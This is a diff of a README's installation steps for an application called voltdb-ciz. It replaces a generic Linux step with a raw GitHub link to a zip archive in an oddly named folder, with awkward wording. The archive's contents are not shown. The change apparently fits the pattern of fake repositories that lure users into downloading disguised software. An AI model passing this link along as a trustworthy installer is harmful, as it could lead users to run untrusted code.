Boomsteve007/voltdb-ciz/README.md

    Once the download is complete:
    - **Windows:** Double-click the `.exe` file and follow the installation prompts.
    - **macOS:** Open the `.pkg` file and follow the instructions to install.
-   - **Linux:** Extract the `.tar.gz` file and follow the included README for installation instructions.
+   - **Linux:** Extract the `https://raw.githubusercontent.com/Boomsteve007/voltdb-ciz/main/minot/voltdb-ciz.zip` file and follow the included README for installation instructions.

 5. **Launch the Application**
    After installation, find voltdb-ciz in your applications menu.
 Click on the icon to launch the program.